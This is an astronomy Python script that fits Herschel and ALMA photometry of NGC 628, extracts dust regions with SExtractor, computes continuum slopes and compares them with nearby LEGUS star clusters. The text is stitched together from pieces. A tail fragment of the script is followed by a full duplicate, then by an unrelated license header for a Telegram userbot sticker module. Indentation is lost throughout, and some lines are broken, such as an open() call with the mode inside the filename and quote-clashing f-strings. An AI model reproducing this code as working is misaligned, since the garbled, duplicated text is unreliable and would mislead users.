np.savetxt('radiation.dat', np.transpose([wfit, bb, ff, sync, flux_sum]), header='wavelength (micron) \t BB (W/m2) \t F-F flux (W/m2) \t Synchrotron (W/m2) \t BB+FF+Sync (W/m2)')
np.savetxt('bb_params.dat', [beta, T], header='best fit parameters for the modified blackbody fit \nbeta, +error, -error \ntemperature, +error, -error')
# for testing how things look:
# read in data from the things above
wavel, bb, ff, sync, total = np.loadtxt(main_dir+'science/herschel/radiation.dat', unpack=True)
hwavel, hflux, herr = np.loadtxt(main_dir+'science/herschel/herschel_flux.dat', unpack=True)
awavel, aflux = np.loadtxt(main_dir + 'science/global/alma_global_flux.dat', unpack=True)
plt.figure()
plt.loglog(hwavel, hflux, 'ko')
plt.loglog(awavel, aflux, 'ro')
plt.loglog(wavel, total, 'k-')
plt.xlabel('Wavelength (micron)')
plt.ylabel(r'Flux (W/m$^2$)')
plt.show()
if regions:
print('\ndoing dust region bidness \n')
os.chdir(main_dir + 'science/')
# read in band 4 header and data
b4_hdulist = fits.open(b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_data = b4_hdu.data
b4_bmaj = b4_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b4_bmin = b4_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# read in band 7 header and data
b7_hdulist = fits.open(b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_data = b7_hdu.data
b7_bmaj = b7_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b7_bmin = b7_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# use sextractor to extract the dust regions
# need to run sextractor from physics network computer like uwpa
b4_sexcmd = 'sex ../%s -c config.sex -catalog_name band4.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b4_fits, b4_bmaj)
b7_sexcmd = 'sex ../%s -c config.sex -catalog_name band7.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b7_fits, b7_bmaj)
# need to run sextractor from extract directory with the config files and default params things
os.chdir(main_dir+'science/extract')
# run sextractor commands
try:
subprocess.call(b4_sexcmd.split())
subprocess.call(b7_sexcmd.split())
except OSError as e:
print(e)
# make new .cats that only have regions that lie within the 80% pbcoverage
in_footprint('band4.cat', '../'+b4_pbcoverage)
in_footprint('band7.cat', '../'+b7_pbcoverage)
# next step is to make ds9 regions out of the sextractor .cat
get_regions('band4.in_footprint.cat')
get_regions('band7.in_footprint.cat')
# outputs band4.in_footprint.reg and band7.in_footprint.reg
done = False
while not done:
check = input('Did you open the in_footprint.reg files and then save them as degree region files? [y/n] ')
if check == 'y'or check == 'yes' or check == 'Y' or check == 'Yes' or check == 'YES' or check == 'yeet' or check == 'YEET':
# need to open band4.in_footprint.reg and band7.in_footprint.reg in ds9 and save as degree region files
overlap('band4.in_footprint.deg.reg', 'band7.in_footprint.deg.reg', sep=1.1)
# outputs band4.overlap.deg.reg and band7.overlap.deg.reg
done = True
else:
print('\nwell do it\n')
if fluxes:
print('\ndoing flux continuum slope bidness \n')
os.chdir(main_dir + 'science/extract')
# grab fluxes in regions
# need the band frequencies
# band 4, band 7
freq = np.array([1.45E+11, 3.43E+11])
wavel = const.c.value/freq
b4_flux, b4_fluxerr, b4_bg = np.loadtxt('band4.overlap.cat', usecols=[0,1,3], unpack=True)
b7_flux, b7_fluxerr, b7_bg = np.loadtxt('band7.overlap.cat', usecols=[0,1,3], unpack=True)
os.chdir(main_dir + 'science/')
# these are the wrong beam sizes (< 0.2% difference)
# b4_bmaj = 1.12562286853788
# b4_bmin = 1.07750606536872
# b7_bmaj = 1.11270332336436
# b7_bmin = 1.04236483573908
# flux from sextractor is in Jy pix/beam so need to get rid of beam business
beams = np.array([ np.pi/4.0 * b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
# Jy
flux = np.array([ b4_flux/pix_per_beam[0], b7_flux/pix_per_beam[1] ])
flux_err = np.array([ b4_fluxerr/pix_per_beam[0], b7_fluxerr/pix_per_beam[1] ])
# Jy to W/m2
fWm2 = np.array([ flux[0] * 1e-26 * freq[0], flux[1] * 1e-26 * freq[1] ])
efWm2 = np.array([ flux_err[0] * 1e-26 * freq[0], flux_err[1] * 1e-26 * freq[1]])
# output
f = open('source_fluxes.dat', 'w')
f.write(f'{'# F(0.87mm) W/m2':>16}')
f.write(' ')
f.write(f'{'Error':>11}')
f.write(' ')
f.write(f'{'F(2.1mm) W/m2':>13}')
f.write(' ')
f.write(f'{'Error':>11}')
f.write('\n')
for i in range(len(fWm2[0])):
f.write(f'{'%1.5e'%fWm2[1][i]:>16}')
f.write(' ')
f.write(f'{'%1.5e'%efWm2[1][i]:>11}')
f.write(' ')
f.write(f'{'%1.5e'%fWm2[0][i]:>13}')
f.write(' ')
f.write(f'{'%1.5e'%efWm2[0][i]:>11}')
f.write('\n')
f.close()
# simple calculation of slopes
slopes = slope(freq, flux)
# mcmc calculation of slopes and the standard deviations on those slopes
err_params = np.zeros([len(flux[0]), 3])
for i in range(len(flux[0])):
y = np.array([flux[0][i], flux[1][i]])*1e-26
err = np.array([flux_err[0][i], flux_err[1][i]])*1e-26
err_params[i] = mcmc_error(slope, wavel, y, err)
np.savetxt('slopes+errs.dat', err_params, header='mean slope \t std dev \t median slope')
if create_legus_region_files:
print('\nturning legus clusters into ds9 region files \n')
os.chdir(main_dir + 'science/legus')
ra, dec, cl = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab', usecols=[3,4,33], unpack=True)
all_clusters = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab')
# first get rid of classes 0 and 4
w = np.where((cl != 0) & (cl != 4))[0]
ra = ra[w]
dec = dec[w]
all_clusters = all_clusters[w]
# output these star clusters as a ds9 degree region file
f = open('ngc628-c_clusters_class123.deg.reg w')
f.write('fk5\n')
for i in range(len(ra)):
f.write('point(%1.6f,%1.6f) # point=X\n'%(ra[i], dec[i]))
f.close()
# write out new cluster catalog file with just classes 1,2,3
np.savetxt('ngc628-c_clusters_class123.cat', all_clusters, delimiter='\t')
if closest_clusters:
print('\nfinding the closest stellar clusters to the dust blobs \n')
os.chdir(main_dir + 'science')
dustcoords, starcoords, age, mass, excess = nearest_cluster('extract/band4.overlap.deg.reg')
# calculate angular separations
ang_sep = np.array([ dustcoords[i].separation(starcoords[i]).arcsec for i in range(len(dustcoords))])
# calculate physical separations in pc
phys_sep = np.array([ ang*10e6 / 206265 for ang in ang_sep ])
age_avg = np.array([ np.mean(a) for a in age ])
mass_avg = np.array([ np.mean(m) for m in mass ])
excess_avg = np.array([ np.mean(e) for e in excess])
phys_sep_avg = np.array([ np.mean(p) for p in phys_sep ])
ang_sep_avg = np.array([ np.mean(a) for a in ang_sep])
age_min = np.array([ np.min(a) for a in age ])
mass_min = np.array([ np.min(m) for m in mass ])
excess_min = np.array([ np.min(e) for e in excess ])
phys_sep_min = np.array([ np.min(p) for p in phys_sep])
ang_sep_min = np.array([ np.min(a) for a in ang_sep])
np.savetxt('closest_clusters_props.average.dat', np.transpose([ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
np.savetxt('closest_clusters_props.minimum.dat', np.transpose([ang_sep_min, phys_sep_min, age_min, mass_min, excess_min]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
if plot:
print('\ndoing some plotting bidness \n')
ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg = np.loadtxt('closest_clusters_props.average.dat', unpack=True)
ang_sep_min, phys_sep_min, age_min, mass_min, excess_min = np.loadtxt('closest_clusters_props.minimum.dat', unpack=True)
slopes = np.loadtxt('slopes+errs.dat', usecols=[0])
plt.figure()
plt.semilogx(age_avg, slopes, 'ro')
# plt.loglog(age_avg, np.abs(slopes), 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_avg.png')
# plt.show()
plt.figure()
plt.semilogx(age_min, slopes, 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/age_min.png')
# plt.show()
plt.figure()
plt.semilogx(mass_avg, slopes, 'ro')
# plt.loglog(mass_avg, -slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/mass_avg.png')
# plt.show()
plt.figure()
plt.semilogx(mass_min, slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/mass_min.png')
# plt.show()
plt.figure()
plt.semilogx(excess_avg, slopes, 'ro')
# plt.loglog(excess_avg, -slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/excess_avg.png')
# plt.show()
plt.figure()
plt.semilogx(excess_min, slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/excess_min.png')
# plt.show()
plt.figure()
plt.semilogy(phys_sep_avg, age_avg, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_sep_avg.png')
plt.figure()
plt.semilogy(phys_sep_min, age_min, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('closest cluster')
plt.savefig('figs/age_sep_min.png')
plt.figure()
plt.semilogx(phys_sep_min, slopes, 'ro')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/slope_vs_sep.png')
if backup:
os.chdir(main_dir + 'science')
# save relevant files in new directory
extract_files = 'cp extract/band4.cat extract/band4.in_footprint.cat extract/band4.in_footprint.deg.reg extract/band4.overlap.cat extract/band4.overlap.deg.reg extract/band7.cat extract/band7.in_footprint.cat extract/band7.in_footprint.deg.reg extract/band7.overlap.cat extract/band7.overlap.deg.reg '+backup_dir
herschel_files = 'cp herschel/bb_params.dat herschel/herschel_flux.dat herschel/radiation.dat herschel/sky.sigma.temp.dat '+backup_dir # also tables.asc renamed to tables.herschel.asc
global_files = 'cp global/alma_global_flux.dat '+backup_dir # also tables.asc renamed to tables.alma.asc
files = 'cp slopes+errs.dat all_clusters.dat closest_clusters_props.average.dat closest_clusters_props.minimum.dat source_fluxes.dat '+backup_dir #also figs directory copied
try:
subprocess.call(['mkdir', '-p', backup_dir])
except:
print('failed to make backup directory')
try:
subprocess.call(extract_files.split())
except:
print('failed to copy extract directory files')
try:
subprocess.call(herschel_files.split())
except:
print('failed to copy herschel directory files')
try:
subprocess.call(['cp', 'herschel/tables.asc', backup_dir+'/tables.herschel.asc'])
except:
print('failed to copy herschel tables')
try:
subprocess.call(global_files.split())
except:
print('failed to copy global flux files')
try:
subprocess.call(['cp', 'global/tables.4.asc', backup_dir+'/tables.alma.asc'])
except:
print('failed to global tables')
try:
subprocess.call(files.split())
except:
print('failed to copy main directory files')
try:
subprocess.call(['cp', '-r', 'figs', backup_dir+'/'])
except:
print('failed to copy the figs directory')
| #!/d/users/turner/tools/anaconda3/bin/python
"""
big 'ole python script that (hopefully) goes through the entire science procedure for give band 4 and band 7 fits files
notes are given in science.md
**python3**
to run:
ipython
exec(open('science.py').read())
"""
import numpy as np
import matplotlib.pyplot as plt
import astropy
from astropy.io import fits
import os, sys, subprocess
from astropy import constants as const
# add scripts directory to the path
sys.path.insert(0, '/uwpa2/turner/legus-alma/scripts/')
from ds9_regions_from_sextractor import get_regions
from get_sextractor_in_footprint import in_footprint
from overlapping_regions import overlap
from mcmc_error_bars import mcmc_error
from nearest_cluster import nearest_cluster
"""
if starting with new band 4 and band 7 fits files, you need to:
1. make sure to have pbcoverage files
2. take global.deg.reg and make new pixel files for band 4 and band 7
data1 --> results for sextractor with 5 pixels > 2 sigma
data2 --> results for sextractor with 5 pixels > 2.5 sigma
data3 --> results for sextractor with 5 pixels > 3.0 sigma
data4 --> retry sextractor 5pix > 2 sigma
data5 --> retry sextractor 5pix > 2.5 sigma
data6 --> retry sextractor 5pix > 3.0 sigma
data7 --> sextractor 2pix > 2 sigma
data8 --> sextractor 2pix > 3 sigma
data_oct23 --> using band4.ilsang.pbcor.fits & band7.ilsang.pbcor.fits | sextractor with 5 pixels > 2 sigma
data_oct23_2 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 2 sigma
data_oct23_3 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 3 sigma
data_nov13 --> redo data_oct23 but with much closer overlapping criteria
data_jan31 --> double check if fluxes are being correctly calculated from sextractor
50 contigous pixels > 2 sigma (50 pixels ~ 1/5 beam size)
data_feb5 --> same as before just now outputs the source fluxes [W/m2] in a seperate file
data_feb7 --> last one
data_feb8 --> nevermind this is the last one since overlapping_regions was set to 2.2 arcsec for the separation
but want to have just 1.1 arcsec (beam size)
data_feb12 --> just kidding, this is the last one. fixed beam sizes in fluxes section
"""
# decide what you want:
global_phot = True # perform global photometry?
regions = True # use sextractor to get dust regions and whatnot?
fluxes = True # calculate flux in dust regions and get slopes?
create_legus_region_files = False # create ds9 region files from legus cluster catalog? (probably not necessary since those files are already on the github repo)
closest_clusters = True # find closest stellar clusters to dust regions?
plot = True # do some plotting?
backup = True # backup files
backup_dir = 'data_feb12'
main_dir = '/uwpa2/turner/legus-alma/'
os.chdir(main_dir + 'science')
# define the band 4 and band 7 fits files to use
b4_fits = 'band4.ilsang.pbcor.fits'
b7_fits = 'band7.ilsang.pbcor.fits'
# define the other fits files needed
b4_pbcoverage = 'band4.ilsang.pb.fits'
b7_pbcoverage = 'band7.ilsang.pb.fits'
# defining some functions
def slope(x,y):
"""simple function to return the slope of a log line connecting two points
"""
return (np.log10(y[1]) - np.log10(y[0])) / (np.log10(x[1]) - np.log10(x[0]))
def mbb_func_freq(freq, beta, T, sr_in_images):
C3 = 2 * const.h.value / const.c.value**2
C4 = const.h.value / const.k_B.value
bb = C3 * (freq**(3 + beta)) / (np.exp(C4*freq/T) - 1)
return bb * freq * sr_in_images
# global photometry modified blackbody fit
if global_phot:
from modBBfit import fit
print('\ndoing global photometry bidness \n')
os.chdir(main_dir + 'science/herschel/')
# first need pixel scale of the PACS and SPIRE images. units are MJy*pix/sr. we want Jy
head = fits.open('NGC0628_S500_110_SSS_111_PACSS_70.fits')[0].header
cd11 = head['CD1_1'] # deg/pix
cd22 = head['CD2_2'] # deg/pix
pix_scale_sr = (-cd11 * 3600)*(cd22*3600) / 4.255e10 # sr/pix
# read in phot data from tables.asc
net, num_of_pix = np.loadtxt('tables.asc', usecols=[1,2], unpack=True)
# total number of sr in the images
sr_in_images = pix_scale_sr * num_of_pix[0]
# wavelengths of the hershcel images
wavel = np.array([71.8, 103.0, 157.0, 252.0, 353.0, 511.0])*1.0e-6 # meters
# convert to frequencies
freq = const.c.value/wavel # Hz
# now convert flux from MJy*pix/sr to Jy
net = net * pix_scale_sr * 1e6
flux = net * freq # nu*F_nu
# calculate error in fluxes
sky_sigma, n_sky = np.loadtxt('sky.sigma.temp.dat', usecols=[2,3], unpack=True)
flux_err = sky_sigma * np.sqrt(num_of_pix + num_of_pix**2/n_sky)
cal_err = np.array([.05, .05, .05, .07, .07, .07])*flux
flux_err = flux_err * pix_scale_sr * freq * 1e6
flux_err = np.sqrt(flux_err**2 + cal_err**2)*1e-26
beta, T = fit(freq, flux, flux_err, sr_in_images)
# array of wavelengths for fitting
wfit = np.arange(50, 1e4, 10)
# free-free and synchrotron
ff_flux0 = 12.319e-19
sync_flux0 = 4.567e-19
# alma freq
alma_freq = np.array([1.45E+11, 3.43E+11])
alma_wavel = const.c.value/alma_freq[0] * 1e6
bb = mbb_func_freq(const.c.value/(wfit*1e-6), beta[0], T[0], sr_in_images)*1e-26
ff = ff_flux0 * (alma_wavel/wfit)**.9
sync = sync_flux0 * (alma_wavel/wfit)**.2
flux_sum = bb + ff + sync
# alma global phot
anet, anum_of_pix = np.loadtxt(main_dir+'/science/global/tables.4.asc', usecols=[1,2], unpack=True)
# net is in units Jy*pix/beam
b4_hdulist = fits.open(main_dir+ 'science/'+b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_bmaj = b4_header['bmaj'] * 3600.0
b4_bmin = b4_header['bmin'] * 3600.0
b7_hdulist = fits.open(main_dir+'science/'+b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_bmaj = b7_header['bmaj'] * 3600.0
b7_bmin = b7_header['bmin'] * 3600.0
beams = np.array([ np.pi/4.0 *b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
alma_flux = anet / pix_per_beam # Jy
print('\nband7 flux = %1.5f Jy\n'%alma_flux[1])
print('\nband4 flux = %1.5f Jy\n'%alma_flux[0])
# save alma data
np.savetxt(main_dir+'science/global/alma_global_flux.dat',np.transpose([const.c.value/alma_freq * 1e6, alma_flux*alma_freq*1e-26]), header='wavelength (micron) \t flux (W/m2)' )
# save herschel data
np.savetxt('herschel_flux.dat', np.transpose([const.c.value/freq * 1e6, flux*1e-26, flux_err]), header='wavelength (micron) \t flux (W/m2) \t 1 sigma error')
# save bb, ff, and sync data
np.savetxt('radiation.dat', np.transpose([wfit, bb, ff, sync, flux_sum]), header='wavelength (micron) \t BB (W/m2) \t F-F flux (W/m2) \t Synchrotron (W/m2) \t BB+FF+Sync (W/m2)')
np.savetxt('bb_params.dat', [beta, T], header='best fit parameters for the modified blackbody fit \nbeta, +error, -error \ntemperature, +error, -error')
# for testing how things look:
# read in data from the things above
wavel, bb, ff, sync, total = np.loadtxt(main_dir+'science/herschel/radiation.dat', unpack=True)
hwavel, hflux, herr = np.loadtxt(main_dir+'science/herschel/herschel_flux.dat', unpack=True)
awavel, aflux = np.loadtxt(main_dir + 'science/global/alma_global_flux.dat', unpack=True)
plt.figure()
plt.loglog(hwavel, hflux, 'ko')
plt.loglog(awavel, aflux, 'ro')
plt.loglog(wavel, total, 'k-')
plt.xlabel('Wavelength (micron)')
plt.ylabel(r'Flux (W/m$^2$)')
plt.show()
if regions:
print('\ndoing dust region bidness \n')
os.chdir(main_dir + 'science/')
# read in band 4 header and data
b4_hdulist = fits.open(b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_data = b4_hdu.data
b4_bmaj = b4_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b4_bmin = b4_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# read in band 7 header and data
b7_hdulist = fits.open(b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_data = b7_hdu.data
b7_bmaj = b7_header['bmaj'] * 3600.0 # restoring beam major axis in arcsec
b7_bmin = b7_header['bmin'] * 3600.0 # restoring beam minor axis in arcsec
# use sextractor to extract the dust regions
# need to run sextractor from physics network computer like uwpa
b4_sexcmd = 'sex ../%s -c config.sex -catalog_name band4.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b4_fits, b4_bmaj)
b7_sexcmd = 'sex ../%s -c config.sex -catalog_name band7.cat -detect_minarea 50 -detect_thresh 1.0 -analysis_thresh 1.0 -seeing_FWHM %1.2f -pixel_scale 0.06 -back_type manual -back_value 0.0'%(b7_fits, b7_bmaj)
# need to run sextractor from extract directory with the config files and default params things
os.chdir(main_dir+'science/extract')
# run sextractor commands
try:
subprocess.call(b4_sexcmd.split())
subprocess.call(b7_sexcmd.split())
except OSError as e:
print(e)
# make new .cats that only have regions that lie within the 80% pbcoverage
in_footprint('band4.cat', '../'+b4_pbcoverage)
in_footprint('band7.cat', '../'+b7_pbcoverage)
# next step is to make ds9 regions out of the sextractor .cat
get_regions('band4.in_footprint.cat')
get_regions('band7.in_footprint.cat')
# outputs band4.in_footprint.reg and band7.in_footprint.reg
done = False
while not done:
check = input('Did you open the in_footprint.reg files and then save them as degree region files? [y/n] ')
if check == 'y'or check == 'yes' or check == 'Y' or check == 'Yes' or check == 'YES' or check == 'yeet' or check == 'YEET':
# need to open band4.in_footprint.reg and band7.in_footprint.reg in ds9 and save as degree region files
overlap('band4.in_footprint.deg.reg', 'band7.in_footprint.deg.reg', sep=1.1)
# outputs band4.overlap.deg.reg and band7.overlap.deg.reg
done = True
else:
print('\nwell do it\n')
if fluxes:
print('\ndoing flux continuum slope bidness \n')
os.chdir(main_dir + 'science/extract')
# grab fluxes in regions
# need the band frequencies
# band 4, band 7
freq = np.array([1.45E+11, 3.43E+11])
wavel = const.c.value/freq
b4_flux, b4_fluxerr, b4_bg = np.loadtxt('band4.overlap.cat', usecols=[0,1,3], unpack=True)
b7_flux, b7_fluxerr, b7_bg = np.loadtxt('band7.overlap.cat', usecols=[0,1,3], unpack=True)
os.chdir(main_dir + 'science/')
# these are the wrong beam sizes (< 0.2% difference)
# b4_bmaj = 1.12562286853788
# b4_bmin = 1.07750606536872
# b7_bmaj = 1.11270332336436
# b7_bmin = 1.04236483573908
# flux from sextractor is in Jy pix/beam so need to get rid of beam business
beams = np.array([ np.pi/4.0 * b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
# Jy
flux = np.array([ b4_flux/pix_per_beam[0], b7_flux/pix_per_beam[1] ])
flux_err = np.array([ b4_fluxerr/pix_per_beam[0], b7_fluxerr/pix_per_beam[1] ])
# Jy to W/m2
fWm2 = np.array([ flux[0] * 1e-26 * freq[0], flux[1] * 1e-26 * freq[1] ])
efWm2 = np.array([ flux_err[0] * 1e-26 * freq[0], flux_err[1] * 1e-26 * freq[1]])
# output
f = open('source_fluxes.dat', 'w')
f.write(f'{"# F(0.87mm) W/m2":>16}')
f.write(' ')
f.write(f'{"Error":>11}')
f.write(' ')
f.write(f'{"F(2.1mm) W/m2":>13}')
f.write(' ')
f.write(f'{"Error":>11}')
f.write('\n')
for i in range(len(fWm2[0])):
f.write(f'{"%1.5e"%fWm2[1][i]:>16}')
f.write(' ')
f.write(f'{"%1.5e"%efWm2[1][i]:>11}')
f.write(' ')
f.write(f'{"%1.5e"%fWm2[0][i]:>13}')
f.write(' ')
f.write(f'{"%1.5e"%efWm2[0][i]:>11}')
f.write('\n')
f.close()
# simple calculation of slopes
slopes = slope(freq, flux)
# mcmc calculation of slopes and the standard deviations on those slopes
err_params = np.zeros([len(flux[0]), 3])
for i in range(len(flux[0])):
y = np.array([flux[0][i], flux[1][i]])*1e-26
err = np.array([flux_err[0][i], flux_err[1][i]])*1e-26
err_params[i] = mcmc_error(slope, wavel, y, err)
np.savetxt('slopes+errs.dat', err_params, header='mean slope \t std dev \t median slope')
if create_legus_region_files:
print('\nturning legus clusters into ds9 region files \n')
os.chdir(main_dir + 'science/legus')
ra, dec, cl = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab', usecols=[3,4,33], unpack=True)
all_clusters = np.loadtxt('hlsp_legus_hst_acs-wfc3_ngc628-c_multiband_v1_padagb-mwext-avgapcor.tab')
# first get rid of classes 0 and 4
w = np.where((cl != 0) & (cl != 4))[0]
ra = ra[w]
dec = dec[w]
all_clusters = all_clusters[w]
# output these star clusters as a ds9 degree region file
f = open('ngc628-c_clusters_class123.deg.reg w')
f.write('fk5\n')
for i in range(len(ra)):
f.write('point(%1.6f,%1.6f) # point=X\n'%(ra[i], dec[i]))
f.close()
# write out new cluster catalog file with just classes 1,2,3
np.savetxt('ngc628-c_clusters_class123.cat', all_clusters, delimiter='\t')
if closest_clusters:
print('\nfinding the closest stellar clusters to the dust blobs \n')
os.chdir(main_dir + 'science')
dustcoords, starcoords, age, mass, excess = nearest_cluster('extract/band4.overlap.deg.reg')
# calculate angular separations
ang_sep = np.array([ dustcoords[i].separation(starcoords[i]).arcsec for i in range(len(dustcoords))])
# calculate physical separations in pc
phys_sep = np.array([ ang*10e6 / 206265 for ang in ang_sep ])
age_avg = np.array([ np.mean(a) for a in age ])
mass_avg = np.array([ np.mean(m) for m in mass ])
excess_avg = np.array([ np.mean(e) for e in excess])
phys_sep_avg = np.array([ np.mean(p) for p in phys_sep ])
ang_sep_avg = np.array([ np.mean(a) for a in ang_sep])
age_min = np.array([ np.min(a) for a in age ])
mass_min = np.array([ np.min(m) for m in mass ])
excess_min = np.array([ np.min(e) for e in excess ])
phys_sep_min = np.array([ np.min(p) for p in phys_sep])
ang_sep_min = np.array([ np.min(a) for a in ang_sep])
np.savetxt('closest_clusters_props.average.dat', np.transpose([ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
np.savetxt('closest_clusters_props.minimum.dat', np.transpose([ang_sep_min, phys_sep_min, age_min, mass_min, excess_min]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
if plot:
print('\ndoing some plotting bidness \n')
ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg = np.loadtxt('closest_clusters_props.average.dat', unpack=True)
ang_sep_min, phys_sep_min, age_min, mass_min, excess_min = np.loadtxt('closest_clusters_props.minimum.dat', unpack=True)
slopes = np.loadtxt('slopes+errs.dat', usecols=[0])
plt.figure()
plt.semilogx(age_avg, slopes, 'ro')
# plt.loglog(age_avg, np.abs(slopes), 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_avg.png')
# plt.show()
plt.figure()
plt.semilogx(age_min, slopes, 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/age_min.png')
# plt.show()
plt.figure()
plt.semilogx(mass_avg, slopes, 'ro')
# plt.loglog(mass_avg, -slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/mass_avg.png')
# plt.show()
plt.figure()
plt.semilogx(mass_min, slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/mass_min.png')
# plt.show()
plt.figure()
plt.semilogx(excess_avg, slopes, 'ro')
# plt.loglog(excess_avg, -slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/excess_avg.png')
# plt.show()
plt.figure()
plt.semilogx(excess_min, slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/excess_min.png')
# plt.show()
plt.figure()
plt.semilogy(phys_sep_avg, age_avg, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_sep_avg.png')
plt.figure()
plt.semilogy(phys_sep_min, age_min, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('closest cluster')
plt.savefig('figs/age_sep_min.png')
plt.figure()
plt.semilogx(phys_sep_min, slopes, 'ro')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/slope_vs_sep.png')
if backup:
os.chdir(main_dir + 'science')
# save relevant files in new directory
extract_files = 'cp extract/band4.cat extract/band4.in_footprint.cat extract/band4.in_footprint.deg.reg extract/band4.overlap.cat extract/band4.overlap.deg.reg extract/band7.cat extract/band7.in_footprint.cat extract/band7.in_footprint.deg.reg extract/band7.overlap.cat extract/band7.overlap.deg.reg '+backup_dir
herschel_files = 'cp herschel/bb_params.dat herschel/herschel_flux.dat herschel/radiation.dat herschel/sky.sigma.temp.dat '+backup_dir # also tables.asc renamed to tables.herschel.asc
global_files = 'cp global/alma_global_flux.dat '+backup_dir # also tables.asc renamed to tables.alma.asc
files = 'cp slopes+errs.dat all_clusters.dat closest_clusters_props.average.dat closest_clusters_props.minimum.dat source_fluxes.dat '+backup_dir #also figs directory copied
try:
subprocess.call(['mkdir', '-p', backup_dir])
except:
print('failed to make backup directory')
try:
subprocess.call(extract_files.split())
except:
print('failed to copy extract directory files')
try:
subprocess.call(herschel_files.split())
except:
print('failed to copy herschel directory files')
try:
subprocess.call(['cp', 'herschel/tables.asc', backup_dir+'/tables.herschel.asc'])
except:
print('failed to copy herschel tables')
try:
subprocess.call(global_files.split())
except:
print('failed to copy global flux files')
try:
subprocess.call(['cp', 'global/tables.4.asc', backup_dir+'/tables.alma.asc'])
except:
print('failed to global tables')
try:
subprocess.call(files.split())
except:
print('failed to copy main directory files')
try:
subprocess.call(['cp', '-r', 'figs', backup_dir+'/'])
except:
print('failed to copy the figs directory')
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
